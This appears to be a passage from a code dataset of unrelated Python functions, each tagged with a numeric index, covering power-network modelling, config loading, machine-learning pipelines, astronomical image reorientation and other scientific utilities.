pp.create_line(net, bus_800, bus_802, length_km=0.786384, std_type='CF-300', name='Line 0')
pp.create_line(net, bus_802, bus_806, length_km=0.527304, std_type='CF-300', name='Line 1')
pp.create_line(net, bus_806, bus_808, length_km=9.823704, std_type='CF-300', name='Line 2')
pp.create_line(net, bus_808, bus_810, length_km=1.769059, std_type='CF-303', name='Line 3')
pp.create_line(net, bus_808, bus_812, length_km=11.43000, std_type='CF-300', name='Line 4')
pp.create_line(net, bus_812, bus_814, length_km=9.061704, std_type='CF-300', name='Line 5')
# pp.create_line(net, bus_814, bus_850, length_km=0.003048, std_type='CF-301', name='Line 6')
pp.create_line(net, bus_816, bus_818, length_km=0.521208, std_type='CF-302', name='Line 7')
pp.create_line(net, bus_816, bus_824, length_km=3.112008, std_type='CF-301', name='Line 8')
pp.create_line(net, bus_818, bus_820, length_km=14.67612, std_type='CF-302', name='Line 9')
pp.create_line(net, bus_820, bus_822, length_km=4.187952, std_type='CF-302', name='Line 10')
pp.create_line(net, bus_824, bus_826, length_km=0.923544, std_type='CF-303', name='Line 11')
pp.create_line(net, bus_824, bus_828, length_km=0.256032, std_type='CF-301', name='Line 12')
pp.create_line(net, bus_828, bus_830, length_km=6.230112, std_type='CF-301', name='Line 13')
pp.create_line(net, bus_830, bus_854, length_km=0.158496, std_type='CF-301', name='Line 14')
pp.create_line(net, bus_832, bus_858, length_km=1.493520, std_type='CF-301', name='Line 15')
pp.create_line(net, bus_834, bus_860, length_km=0.615696, std_type='CF-301', name='Line 16')
pp.create_line(net, bus_834, bus_842, length_km=0.085344, std_type='CF-301', name='Line 17')
pp.create_line(net, bus_836, bus_840, length_km=0.262128, std_type='CF-301', name='Line 18')
pp.create_line(net, bus_836, bus_862, length_km=0.085344, std_type='CF-301', name='Line 19')
pp.create_line(net, bus_842, bus_844, length_km=0.411480, std_type='CF-301', name='Line 20')
pp.create_line(net, bus_844, bus_846, length_km=1.109472, std_type='CF-301', name='Line 21')
pp.create_line(net, bus_846, bus_848, length_km=0.161544, std_type='CF-301', name='Line 22')
pp.create_line(net, bus_850, bus_816, length_km=0.094488, std_type='CF-301', name='Line 23')
# pp.create_line(net, bus_852, bus_832, length_km=0.003048, std_type='CF-301', name='Line 24')
pp.create_line(net, bus_854, bus_856, length_km=7.110984, std_type='CF-303', name='Line 25')
pp.create_line(net, bus_854, bus_852, length_km=11.22578, std_type='CF-301', name='Line 26')
pp.create_line(net, bus_858, bus_864, length_km=0.493776, std_type='CF-302', name='Line 27')
pp.create_line(net, bus_858, bus_834, length_km=1.776984, std_type='CF-301', name='Line 28')
pp.create_line(net, bus_860, bus_836, length_km=0.816864, std_type='CF-301', name='Line 29')
pp.create_line(net, bus_860, bus_838, length_km=1.481328, std_type='CF-304', name='Line 30')
pp.create_line(net, bus_888, bus_890, length_km=3.218688, std_type='CF-300', name='Line 31')
# Regulator 1
pp.create_transformer_from_parameters(net, bus_814, bus_850, sn_mva=2.5, vn_hv_kv=24.9,
vn_lv_kv=24.9, vkr_percent=0.320088*2.5, vk_percent=0.357539*2.5,
pfe_kw=0.0, i0_percent=0.0, shift_degree=0.0,
tap_side='lv', tap_neutral=0, tap_max=16, tap_min=-16,
tap_step_percent=0.625, tap_pos=0, tap_phase_shifter=False,
name='Regulator 1')
# Regulator 2
pp.create_transformer_from_parameters(net, bus_852, bus_832, sn_mva=2.5, vn_hv_kv=24.9,
vn_lv_kv=24.9, vkr_percent=0.320088*2.5, vk_percent=0.357539*2.5,
pfe_kw=0.0, i0_percent=0.0, shift_degree=0.0,
tap_side='lv', tap_neutral=0, tap_max=16, tap_min=-16,
tap_step_percent=0.625, tap_pos=0, tap_phase_shifter=False,
name='Regulator 2')
# # Substation
# pp.create_transformer_from_parameters(net, bus0, bus_800, sn_mva=2.5, vn_hv_kv=69.0,
# vn_lv_kv=24.9, vkr_percent=1.0, vk_percent=8.062257,
# pfe_kw=0.0, i0_percent=0.0, shift_degree=0.0,
# tap_side='lv', tap_neutral=0, tap_max=2, tap_min=-2,
# tap_step_percent=2.5, tap_pos=0, tap_phase_shifter=False,
# name='Substation')
# Traformer
pp.create_transformer_from_parameters(net, bus_832, bus_888, sn_mva=0.5, vn_hv_kv=24.9,
vn_lv_kv=4.16, vkr_percent=1.9, vk_percent=4.5,
pfe_kw=0.0, i0_percent=0.0, shift_degree=0.0,
name='Transformer 1')
# Loads
pp.create_load(net, bus_806, p_mw=0.055, q_mvar=0.029, name='Load 806')
pp.create_load(net, bus_810, p_mw=0.016, q_mvar=0.008, name='Load 810')
pp.create_load(net, bus_820, p_mw=0.034, q_mvar=0.017, name='Load 820')
pp.create_load(net, bus_822, p_mw=0.135, q_mvar=0.070, name='Load 822')
pp.create_load(net, bus_824, p_mw=0.005, q_mvar=0.002, name='Load 824')
pp.create_load(net, bus_826, p_mw=0.004, q_mvar=0.020, name='Load 826')
pp.create_load(net, bus_828, p_mw=0.004, q_mvar=0.002, name='Load 828')
pp.create_load(net, bus_830, p_mw=0.007, q_mvar=0.003, name='Load 830')
pp.create_load(net, bus_856, p_mw=0.004, q_mvar=0.002, name='Load 856')
pp.create_load(net, bus_858, p_mw=0.015, q_mvar=0.007, name='Load 858')
pp.create_load(net, bus_864, p_mw=0.002, q_mvar=0.001, name='Load 864')
pp.create_load(net, bus_834, p_mw=0.032, q_mvar=0.017, name='Load 834')
pp.create_load(net, bus_860, p_mw=0.029, q_mvar=0.073, name='Load 860')
pp.create_load(net, bus_836, p_mw=0.082, q_mvar=0.043, name='Load 836')
pp.create_load(net, bus_840, p_mw=0.040, q_mvar=0.020, name='Load 840')
pp.create_load(net, bus_838, p_mw=0.028, q_mvar=0.014, name='Load 838')
pp.create_load(net, bus_844, p_mw=0.009, q_mvar=0.005, name='Load 844')
pp.create_load(net, bus_846, p_mw=0.037, q_mvar=0.031, name='Load 846')
pp.create_load(net, bus_848, p_mw=0.023, q_mvar=0.011, name='Load 848')
pp.create_load(net, bus_860, p_mw=0.060, q_mvar=0.048, name='Load 860 spot')
pp.create_load(net, bus_840, p_mw=0.027, q_mvar=0.021, name='Load 840 spot')
pp.create_load(net, bus_844, p_mw=0.405, q_mvar=0.315, name='Load 844 spot')
pp.create_load(net, bus_848, p_mw=0.060, q_mvar=0.048, name='Load 848 spot')
pp.create_load(net, bus_890, p_mw=0.450, q_mvar=0.225, name='Load 890 spot')
pp.create_load(net, bus_830, p_mw=0.045, q_mvar=0.020, name='Load 830 spot')
# External grid
pp.create_ext_grid(net, bus_800, vm_pu=1.0, va_degree=0.0, s_sc_max_mva=10.0,
s_sc_min_mva=10.0, rx_max=1, rx_min=1, r0x0_max=1, x0x_max=1)
# Distributed generators
pp.create_sgen(net, bus_848, p_mw=0.66, q_mvar=0.500, name='DG 1', max_p_mw=0.66, min_p_mw=0, max_q_mvar=0.5, min_q_mvar=0)
pp.create_sgen(net, bus_890, p_mw=0.50, q_mvar=0.375, name='DG 2', max_p_mw=0.50, min_p_mw=0, max_q_mvar=0.375, min_q_mvar=0)
pp.create_sgen(net, bus_822, p_mw=0.1, type='PV', name='PV 1', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
pp.create_sgen(net, bus_856, p_mw=0.1, type='PV', name='PV 2', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
pp.create_sgen(net, bus_838, p_mw=0.1, type='PV', name='PV 3', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
pp.create_sgen(net, bus_822, p_mw=0.1, type='WP', name='WP 1', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
pp.create_sgen(net, bus_826, p_mw=0.1, type='WP', name='WP 2', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
pp.create_sgen(net, bus_838, p_mw=0.1, type='WP', name='WP 3', max_p_mw=0.1, min_p_mw=0, max_q_mvar=0, min_q_mvar=0)
# Shunt capacity bank
pp.create_shunt(net, bus_840, q_mvar=-0.12, name='SCB 1', step=4, max_step=4)
pp.create_shunt(net, bus_864, q_mvar=-0.12, name='SCB 2', step=4, max_step=4)
# storage
pp.create_storage(net, bus_810, p_mw=0.5, max_e_mwh=2, sn_mva=1.0, soc_percent=50, min_e_mwh=0.2, name='Storage')
return net | 5,333,534 |
def set_metadata(candidates, traces, dependencies, pythons):
"""Add "metadata" to candidates based on the dependency tree.
Metadata for a candidate includes markers and a specifier for Python
version requirements.
:param candidates: A key-candidate mapping. Candidates in the mapping will
have their markers set.
:param traces: A graph trace (produced by `traces.trace_graph`) providing
information about dependency relationships between candidates.
:param dependencies: A key-collection mapping containing what dependencies
each candidate in `candidates` requested.
:param pythons: A key-str mapping containing Requires-Python information
of each candidate.
Keys in mappings and entries in the trace are identifiers of a package, as
implemented by the `identify` method of the resolver's provider.
The candidates are modified in-place.
"""
metasets_mapping = _calculate_metasets_mapping(
dependencies, pythons, copy.deepcopy(traces),
)
for key, candidate in candidates.items():
candidate.markers = _format_metasets(metasets_mapping[key]) | 5,333,535 |
def _hack_namedtuple(cls):
"""Make class generated by namedtuple picklable."""
name = cls.__name__
fields = cls._fields
def reduce(self):
return (_restore, (name, fields, tuple(self)))
cls.__reduce__ = reduce
cls._is_namedtuple_ = True
return cls | 5,333,536 |
def create_symbolize_task_if_needed(testcase):
"""Creates a symbolize task if needed."""
# We cannot run symbolize job for custom binaries since we don't have any
# archived symbolized builds.
if build_manager.is_custom_binary():
return
# Make sure we have atleast one symbolized url pattern defined in job type.
if not build_manager.has_symbolized_builds():
return
tasks.add_task('symbolize', testcase.key.id(), testcase.job_type) | 5,333,537 |
def load_config(settings_file='./test_settings.py'):
"""
Loads the config files merging the defaults
with the file defined in environ.PULLSBURY_SETTINGS if it exists.
"""
config = Config(os.getcwd())
if 'PULLSBURY_SETTINGS' in os.environ:
config.from_envvar('PULLSBURY_SETTINGS')
else:
config.from_pyfile(settings_file)
if config.get('LOGGING_CONFIG'):
logging.config.fileConfig(
config.get('LOGGING_CONFIG'),
disable_existing_loggers=False)
json_values = [
'TEAMS',
'HAPPY_SLACK_EMOJIS',
'REPO_BLACKLIST',
'SLACK_CUSTOM_EMOJI_MAPPING'
]
for value in json_values:
config.update({
value: json.loads(config.get(value, '{}'))
})
return config | 5,333,538 |
def build_model():
"""
Returns built and tuned model using pipeline
Parameters:
No arguments
Returns:
cv (estimator): tuned model
"""
pipeline = Pipeline([
('Features', FeatureUnion([
('text_pipeline', Pipeline([
('vect', CountVectorizer(tokenizer=tokenize)),
('tfidf', TfidfTransformer())
])),
('starting_verb', StartingVerbExtractor())
])),
('clf', MultiOutputClassifier(DecisionTreeClassifier()))
])
# now we can perform another grid search on this new estimator to be sure we have the best parameters
parameters = {
#'Features__text_pipeline__vect__max_df': [0.5,1.0],
'Features__text_pipeline__tfidf__smooth_idf': (True, False)
}
cv = GridSearchCV(pipeline, param_grid=parameters)
return cv | 5,333,539 |
def date_range(
start: pandas._libs.tslibs.timestamps.Timestamp,
end: pandas._libs.tslibs.timestamps.Timestamp,
freq: Literal["1M"],
):
"""
usage.dask: 1
"""
... | 5,333,540 |
def INPUT_BTN(**attributes):
"""
Utility function to create a styled button
"""
return SPAN(INPUT(_class = "button-right",
**attributes),
_class = "button-left") | 5,333,541 |
def load_annotations(file_path):
"""Loads a file containing annotations for multiple documents.
The file should contain lines with the following format:
<DOCUMENT ID> <LINES> <SPAN START POSITIONS> <SPAN LENGTHS> <SEVERITY>
Fields are separated by tabs; LINE, SPAN START POSITIONS and SPAN LENGTHS
can have a list of values separated by white space.
Args:
file_path: path to the file.
Returns:
a dictionary mapping document id's to a list of annotations.
"""
annotations = defaultdict(list)
with open(file_path, 'r', encoding='utf8') as f:
for i, line in enumerate(f):
line = line.strip()
if not line:
continue
fields = line.split('\t')
doc_id = fields[0]
try:
annotation = Annotation.from_fields(fields[1:])
except OverlappingSpans:
msg = 'Overlapping spans when reading line %d of file %s '
msg %= (i, file_path)
print(msg)
continue
annotations[doc_id].append(annotation)
return annotations | 5,333,542 |
def search(request, template_name='blog/post_search.html'):
"""
Search for blog posts.
This template will allow you to setup a simple search form that will try to return results based on
given search strings. The queries will be put through a stop words filter to remove words like
'the', 'a', or 'have' to help imporve the result set.
Template: ``blog/post_search.html``
Context:
object_list
List of blog posts that match given search term(s).
search_term
Given search term.
"""
context = {}
if request.GET:
stop_word_list = re.compile(STOP_WORDS_RE, re.IGNORECASE)
search_term = '%s' % request.GET['q']
cleaned_search_term = stop_word_list.sub('', search_term)
cleaned_search_term = cleaned_search_term.strip()
if len(cleaned_search_term) != 0:
post_list = Post.objects.published().filter(Q(title__icontains=cleaned_search_term) | Q(body__icontains=cleaned_search_term) | Q(tags__icontains=cleaned_search_term) | Q(categories__title__icontains=cleaned_search_term))
context = {'object_list': post_list, 'search_term':search_term}
else:
message = 'Search term was too vague. Please try again.'
context = {'message':message}
return render(request, template_name, context) | 5,333,543 |
def orient_data (data, header, header_out=None, MLBG_rot90_flip=False, log=None,
tel=None):
"""Function to remap [data] from the CD matrix defined in [header] to
the CD matrix taken from [header_out]. If the latter is not
provided the output orientation will be North up, East left.
If [MLBG_rot90_flip] is switched on and the data is from MeerLICHT or
BlackGEM, the data will be oriented within a few degrees from
North up, East left while preserving the pixel values in the new,
*remapped* reference, D and Scorr images.
"""
# rotation matrix:
# R = [[dx * cos(theta), dy * -sin(theta)],
# [dx * sin(theta), dy * cos(theta)]]
# with theta=0: North aligned with positive y-axis
# and East with the positive x-axis (RA increases to the East)
#
# N.B.: np.dot(R, [[x], [y]]) = np.dot([x,y], R.T)
#
# matrices below are defined using the (WCS) header keywords
# CD?_?:
#
# [ CD1_1 CD2_1 ]
# [ CD1_2 CD2_2 ]
#
# orient [data] with its orientation defined in [header] to the
# orientation defined in [header_out]. If the latter is not
# provided, the output orientation will be North up, East left.
# check if input data is square; if it is not, the transformation
# will not be done properly.
assert data.shape[0] == data.shape[1]
# define data CD matrix, assumed to be in [header]
CD_data = read_CD_matrix (header, log=log)
# determine output CD matrix, either from [header_out] or North
# up, East left
if header_out is not None:
CD_out = read_CD_matrix (header_out, log=log)
else:
# define de CD matrix with North up and East left, using the
# pixel scale from the input [header]
pixscale = read_header(header, ['pixscale'])
cdelt = pixscale/3600
CD_out = np.array([[-cdelt, 0], [0, cdelt]])
# check if values of CD_data and CD_out are similar
CD_close = [math.isclose(CD_data[i,j], CD_out[i,j], rel_tol=1e-3)
for i in range(2) for j in range(2)]
#if log is not None:
# log.info ('CD_close: {}'.format(CD_close))
if np.all(CD_close):
#if log is not None:
# log.info ('data CD matrix already similar to CD_out matrix; '
# 'no need to remap data')
# if CD matrix values are all very similar, do not bother to
# do the remapping
data2return = data
elif MLBG_rot90_flip and tel in ['ML1', 'BG2', 'BG3', 'BG4']:
#if log is not None:
# log.info ('for ML/BG: rotating data by exactly 90 degrees and for '
# 'ML also flip left/right')
# rotate data by exactly 90 degrees counterclockwise (when
# viewing data with y-axis increasing to the top!) and for ML1
# also flip in the East-West direction; for ML/BG this will
# result in an image within a few degrees of the North up,
# East left orientation while preserving the original pixel
# values of the new, *remapped* reference, D and Scorr images.
data2return = np.rot90(data, k=-1)
if tel=='ML1':
data2return = np.fliplr(data2return)
# equivalent operation: data2return = np.flipud(np.rot90(data))
else:
#if log is not None:
# log.info ('remapping data from input CD matrix: {} to output CD '
# 'matrix: {}'.format(CD_data, CD_out))
# transformation matrix, which is the dot product of the
# output CD matrix and the inverse of the data CD matrix
CD_data_inv = np.linalg.inv(CD_data)
CD_trans = np.dot(CD_out, CD_data_inv)
# transpose and flip because [affine_transform] performs
# np.dot(matrix, [[y],[x]]) rather than np.dot([x,y], matrix)
matrix = np.flip(CD_trans.T)
# offset, calculated from
#
# [xi - dxi, yo - dyo] = np.dot( [xo - dxo, yo - dyo], CD_trans )
#
# where xi, yi are the input coordinates corresponding to the
# output coordinates xo, yo in data and dxi/o, dyi/o are the
# corresponding offsets from the point of
# rotation/transformation, resulting in
#
# [xi, yi] = np.dot( [xo, yo], CD_trans ) + offset
# with
# offset = -np.dot( [dxo, dyo], CD_trans ) + [dxi, dyi]
# setting [dx0, dy0] and [dxi, dyi] to the center
center = (np.array(data.shape)-1)/2
offset = -np.dot(center, np.flip(CD_trans)) + center
# infer transformed data
data2return = ndimage.affine_transform(data, matrix, offset=offset,
mode='nearest')
return data2return | 5,333,544 |
def _batchnorm_to_groupnorm(module: nn.modules.batchnorm._BatchNorm) -> nn.Module:
"""
Converts a BatchNorm ``module`` to GroupNorm module.
This is a helper function.
Args:
module: BatchNorm module to be replaced
Returns:
GroupNorm module that can replace the BatchNorm module provided
Notes:
A default value of 32 is chosen for the number of groups based on the
paper *Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour*
https://arxiv.org/pdf/1706.02677.pdf
"""
return nn.GroupNorm(min(32, module.num_features), module.num_features, affine=True) | 5,333,545 |
def uninstall_problem(problem_name):
"""
Uninstalls a given problem, which means that the generated debian package
and source files within the SHARED_ROOT directory are removed.
An uninstalled problem will no longer appear when listing problems, even
if deployed instances remain (undeploying all instances of a problem
before uninstallation is recommended.)
Additionally, any assigned instance ports for the problem will be
removed from the port map.
"""
acquire_lock()
try:
# Remove .deb package used to install dependencies on deployment
os.remove(join(DEB_ROOT, problem_name + '.deb'))
# Remove problem source used for templating instances
shutil.rmtree(join(PROBLEM_ROOT, problem_name))
# Remove any ports assigned to this problem from the port map
port_map_path = join(SHARED_ROOT, 'port_map.json')
with open(port_map_path, 'r') as f:
port_map = json.load(f)
port_map = {literal_eval(k): v for k, v in port_map.items()}
port_map = {k: v for k, v in port_map.items() if k[0] != problem_name}
with open(port_map_path, 'w') as f:
stringified_port_map = {repr(k): v for k, v in port_map.items()}
json.dump(stringified_port_map, f)
except Exception as e:
logger.error(
f"An error occurred while uninstalling {problem_name}:")
logger.error(f'{str(e)}')
raise FatalException
logger.info(f"{problem_name} removed successfully")
release_lock() | 5,333,546 |
def _check_wd():
"""
This function checks that the working directory exists with write permission
:raises SystemExit: if the folder is absent or the user has no write permission
"""
if not os.path.exists(_plot_dir):
_logger.warning('Impossible to read %s' % _plot_dir)
raise SystemExit
if not os.access(_plot_dir, os.W_OK):
_logger.warning('Impossible to write into %s' % _plot_dir)
raise SystemExit | 5,333,547 |
def main(cfg, dry_run):
"""Work with domino compute nodes from your local machine.
To work with files in a domino project locally, you need
to either mount the domino directory on your machine (not yet
supported by this script) or copy files back and forth.
This script manages that copy back-and-forth using rsync,
and a configuration file in the directory you are syncing with domino.
This tool relies on a configuration file, `{__CONFIG__!s}`, which
you can create with the `init` command. All of the subcommands
for this tool will accept the full ssh command string from
domino (something like `ssh -p 49001 ubuntu@ec2-*.us-west-2.compute.amazonaws.com`).
You can cache this string using the `box` subcommand, which
'boxes' up your connection string and adds it to the
configuration file (`{__CONFIG__!s}`) for later use. Unfortunately,
there does not seem to be a way to automatically discover the
ec2 address of the host machine for a given domino run
programatically.
Commonly useful commands other than `init` and `box` are `up` and
`down`, which rsync files up to and down from domino respectively
using rsync to ensure that only changed files are moved. Also,
the `ssh` command will open an ssh connection and return the command
line to you. This is mostly useful if you've stored connection
info using `box`. Finally, `ddd` will open a persistent ssh connection
and set up port forwarding for the dask dashboard, which you can then
open in a webbrowser. This requires that you have the `jt.py` script
on your path as well as this script.
"""
cfg['rsync.dry_run'] = dry_run | 5,333,548 |
def _compute_bic(
data: np.array,
n_clusters: int
) -> BICResult:
"""Compute the BIC statistic.
Parameters
----------
data: np.array
The data to cluster.
n_clusters: int
Number of clusters to test.
Returns
-------
results: BICResult
The results as a BICResult object.
"""
gm = GaussianMixture(n_clusters)
gm.fit(data)
return BICResult(gm.bic(data), n_clusters) | 5,333,549 |
def release_branch_name(config):
"""
build expected release branch name from current config
"""
branch_name = "{0}{1}".format(
config.gitflow_release_prefix(),
config.package_version()
)
return branch_name | 5,333,550 |
def torch2numpy(data):
""" Transfer data from the torch tensor (on CPU) to the numpy array (on CPU). """
return data.numpy() | 5,333,551 |
def test_openmm_nonbonded_methods(inputs):
"""See test_nonbonded_method_resolution in openff/toolkit/tests/test_forcefield.py"""
vdw_method = inputs["vdw_method"]
electrostatics_method = inputs["electrostatics_method"]
periodic = inputs["periodic"]
result = inputs["result"]
molecules = [create_ethanol()]
forcefield = ForceField("test_forcefields/test_forcefield.offxml")
pdbfile = app.PDBFile(get_data_file_path("systems/test_systems/1_ethanol.pdb"))
topology = Topology.from_openmm(pdbfile.topology, unique_molecules=molecules)
if not periodic:
topology.box_vectors = None
if type(result) == int:
nonbonded_method = result
# The method is validated and may raise an exception if it's not supported.
forcefield.get_parameter_handler("vdW", {}).method = vdw_method
forcefield.get_parameter_handler(
"Electrostatics", {}
).method = electrostatics_method
openff_interchange = Interchange.from_smirnoff(
force_field=forcefield, topology=topology
)
openmm_system = openff_interchange.to_openmm(combine_nonbonded_forces=True)
for force in openmm_system.getForces():
if isinstance(force, openmm.NonbondedForce):
assert force.getNonbondedMethod() == nonbonded_method
break
else:
raise Exception
elif issubclass(result, (BaseException, Exception)):
exception = result
with pytest.raises(exception):
forcefield.get_parameter_handler("vdW", {}).method = vdw_method
forcefield.get_parameter_handler(
"Electrostatics", {}
).method = electrostatics_method
openff_interchange = Interchange.from_smirnoff(
force_field=forcefield, topology=topology
)
openff_interchange.to_openmm(combine_nonbonded_forces=True)
else:
raise Exception("uh oh") | 5,333,552 |
def register_cli_handler(instance, **options):
"""
registers a new alembic cli handler or replaces the existing one
if `replace=True` is provided. otherwise, it raises an error
on adding a cli handler which is already registered.
:param AlembicCLIHandlerBase instance: alembic cli handler to be registered.
it must be an instance of
AlembicCLIHandlerBase.
:keyword bool replace: specifies that if there is another registered
cli handler with the same name, replace it
with the new one, otherwise raise an error.
defaults to False.
:raises InvalidCLIHandlerTypeError: invalid cli handler type error.
:raises DuplicatedCLIHandlerError: duplicated cli handler error.
"""
get_component(AlembicPackage.COMPONENT_NAME).register_cli_handler(instance, **options) | 5,333,553 |
def read_point_cloud_file(file_path):
"""Read bfpc dump and print the frame ID and number of returns in the received frame.
This example will stop, when the dump is completly read out.
:param file_path: Path to dump file
"""
file_stream = blickfeld_scanner.stream.point_cloud(from_file=file_path) # Connect to the device
print(file_stream.get_metadata()) # print meta data of the dump (footer and header)
while not file_stream.end_of_stream():
frame = file_stream.recv_frame() # Receive a frame.
# Format of frame is described in protocol/blickfeld/data/frame.proto or doc/protocol.md
# Protobuf API is described in https://developers.google.com/protocol-buffers/docs/pythontutorial
print(f"Got {frame}") | 5,333,554 |
def new_schema(name, public_name, is_active=True, **options):
"""
This function adds a schema in schema model and creates physical schema.
"""
try:
schema = Schema(name=name, public_name=public_name, is_active=is_active)
schema.save()
except IntegrityError:
raise Exception('Schema already exists.')
create_schema(name, **options)
return schema | 5,333,555 |
def ROW(cell_reference):
"""Returns the row number of a specified cell."""
raise NotImplementedError() | 5,333,556 |
def find_appropriate_timestep(simulation_factory,
equilibrium_samples,
M,
midpoint_operator,
temperature,
timestep_range,
DeltaF_neq_threshold=1.0,
max_samples=10000,
batch_size=1000,
verbose=True
):
"""Perform binary search* over the timestep range, trying to find
the maximum timestep that results in DeltaF_neq that doesn't exceed threshold
or have gross instability problems.
(*Not-quite-binary-search: instead of deterministic comparisons,
it performs hypothesis tests at regular intervals.)
Sketch
------
* Maintain an interval (min_timestep, max_timestep)
* At each iteration:
* timestep <- (min_timestep + max_timestep) / 2
* Only simulate long enough to be confident that DeltaF_neq(timestep) != threshold.
* If we're confident DeltaF_neq(timestep) > threshold, reduce max_timestep to current timestep.
* If we're confident DeltaF_neq(timestep) < threshold, increase min_timestep to current timestep
Parameters
----------
simulation_factory: function
accepts a timestep argument and returns a simulation equipped with an integrator with that
timestep
equilibrium_samples: list
list of samples from the configuration distribution at equilibrium
M: int
protocol length
midpoint_operator: function
accepts a simulation as an argument, doesn't return anything
temperature: unit'd quantity
temperature used to resample velocities
timestep_range: iterable
(min_timestep, max_timestep)
DeltaF_neq_threshold: double, default=1.0
maximum allowable DeltaF_neq
max_samples: int
number of samples
verbose: boolean
if True, print a bunch of stuff to the command prompt
Returns
-------
timestep: unit'd quantity
Maximum timestep tested that doesn't exceed the DeltaF_neq_threshold
"""
max_iter = 10
alpha = 1.96 # for now hard-coded confidence level
min_timestep, max_timestep = timestep_range[0], timestep_range[-1]
for i in range(max_iter):
timestep = (min_timestep + max_timestep) / 2
if verbose:
print("Current feasible range: [{:.3f}fs, {:.3f}fs]".format(
min_timestep.value_in_unit(unit.femtosecond),
max_timestep.value_in_unit(unit.femtosecond)
))
print("Testing: {:.3f}fs".format(timestep.value_in_unit(unit.femtosecond)))
simulation = simulation_factory(timestep)
simulation_crashed = False
changed_timestep_range = False
W_shads_F, W_shads_R, W_midpoints = [], [], []
def update_lists(W_shad_F, W_midpoint, W_shad_R):
W_shads_F.append(W_shad_F)
W_midpoints.append(W_midpoint)
W_shads_R.append(W_shad_R)
# collect up to max_samples protocol samples, making a decision about whether to proceed
# every batch_size samples
for _ in range(max_samples / batch_size):
# collect another batch_size protocol samples
for _ in range(batch_size):
# draw equilibrium sample
#x, v = equilibrium_sampler()
#simulation.context.setPositions(x)
#simulation.context.setVelocities(v)
simulation.context.setPositions(equilibrium_samples[np.random.randint(len(equilibrium_samples))])
simulation.context.setVelocitiesToTemperature(temperature)
# collect and store measurements
# if the simulation crashes, set simulation_crashed flag
try:
update_lists(*apply_protocol(simulation, M, midpoint_operator))
except:
simulation_crashed = True
if verbose: print("A simulation crashed! Considering this timestep unstable...")
# if we didn't crash, update estimate of DeltaF_neq upper and lower confidence bounds
DeltaF_neq, sq_uncertainty = estimate_nonequilibrium_free_energy(np.array(W_shads_F)[:,-1], np.array(W_shads_R)[:,-1])
if np.isnan(DeltaF_neq + sq_uncertainty):
if verbose:
print("A simulation encountered NaNs!")
simulation_crashed = True
bound = alpha * np.sqrt(sq_uncertainty)
DeltaF_neq_lcb, DeltaF_neq_ucb = DeltaF_neq - bound, DeltaF_neq + bound
out_of_bounds = (DeltaF_neq_lcb > DeltaF_neq_threshold) or (DeltaF_neq_ucb < DeltaF_neq_threshold)
if verbose and (out_of_bounds or simulation_crashed):
print("After collecting {} protocol samples, DeltaF_neq is likely in the following interval: "
"[{:.3f}, {:.3f}]".format(len(W_shads_F), DeltaF_neq_lcb, DeltaF_neq_ucb))
# if (DeltaF_neq_lcb > threshold) or (nans are encountered), then we're pretty sure this timestep is too big,
# and we can move on to try a smaller one
if simulation_crashed or (DeltaF_neq_lcb > DeltaF_neq_threshold):
if verbose:
print("This timestep is probably too big!\n")
max_timestep = timestep
changed_timestep_range = True
break
# else, if (DeltaF_neq_ucb < threshold), then we're pretty sure we can get
# away with a larger timestep
elif (DeltaF_neq_ucb < DeltaF_neq_threshold):
if verbose:
print("We can probably get away with a larger timestep!\n")
min_timestep = timestep
changed_timestep_range = True
break
# else, the threshold is within the upper and lower confidence bounds, and we keep going
if (not changed_timestep_range):
timestep = (min_timestep + max_timestep) / 2
if verbose:
print("\nTerminating early: found the following timestep: ".format(timestep.value_in_unit(unit.femtosecond)))
return timestep
if verbose:
timestep = (min_timestep + max_timestep) / 2
print("\nTerminating: found the following timestep: ".format(timestep.value_in_unit(unit.femtosecond)))
return timestep | 5,333,557 |
def critical_bands():
"""
Compute the Critical bands as defined in the book:
Psychoacoustics by Zwicker and Fastl. Table 6.1 p. 159
"""
# center frequencies
fc = [
50,
150,
250,
350,
450,
570,
700,
840,
1000,
1170,
1370,
1600,
1850,
2150,
2500,
2900,
3400,
4000,
4800,
5800,
7000,
8500,
10500,
13500,
]
# boundaries of the bands (e.g. the first band is from 0Hz to 100Hz
# with center 50Hz, fb[0] to fb[1], center fc[0]
fb = [
0,
100,
200,
300,
400,
510,
630,
770,
920,
1080,
1270,
1480,
1720,
2000,
2320,
2700,
3150,
3700,
4400,
5300,
6400,
7700,
9500,
12000,
15500,
]
# now just make pairs
bands = [[fb[j], fb[j + 1]] for j in range(len(fb) - 1)]
return np.array(bands), fc | 5,333,558 |
def repackage(r, amo_id, amo_file, target_version=None, sdk_dir=None):
"""Pull amo_id/amo_file.xpi, schedule xpi creation, return hashtag
"""
# validate entries
# prepare data
hashtag = get_random_string(10)
sdk = SDK.objects.all()[0]
# if (when?) choosing sdk_dir will be possible
# sdk = SDK.objects.get(dir=sdk_dir) if sdk_dir else SDK.objects.all()[0]
sdk_source_dir = sdk.get_source_dir()
# extract packages
tasks.repackage.delay(
amo_id, amo_file, sdk_source_dir, hashtag, target_version)
# call build xpi task
# respond with a hashtag which will identify downloadable xpi
# URL to check if XPI is ready:
# /xpi/check_download/{hashtag}/
# URL to download:
# /xpi/download/{hashtag}/{desired_filename}/
return HttpResponse('{"hashtag": "%s"}' % hashtag,
mimetype='application/json') | 5,333,559 |
def execute_shifts(node):
"""
The function only needs one traversal of the children of v to
execute all shifts computed and memorized in MOVESUBTREE.
"""
shift = 0
change = 0
for child in node.children[::-1]: # all children from right to left
child.prelim += shift
child.mod += shift
change += child.change
shift += child.shift + change | 5,333,560 |
def save_group_df_lengths(df,
root_path:str):
"""Finds the number of posts made in each group, orders them and saves in file
Args:
df: pandas DataFrame
root_path: path to the current directory
Returns: saves a resource file of group ids and their lengths
"""
df = df.groupby("group_id").agg({'id': 'nunique'}).reset_index()
df = df[["group_id", "id"]]
df = df.rename(columns={'id': 'length'})
df = df.sort_values("length", ascending=False)
filename = f"{root_path}/res/group_lengths.csv"
df.to_csv(filename, index=False) | 5,333,561 |
def _click(event, x, y, flags, param):
"""
Helper func.
Record the pixel location of click on an image and annotate the image with
a color coded box. Green box: recorded as a "positive example", Blue box:
recorded as a "negative example."
Modified from:
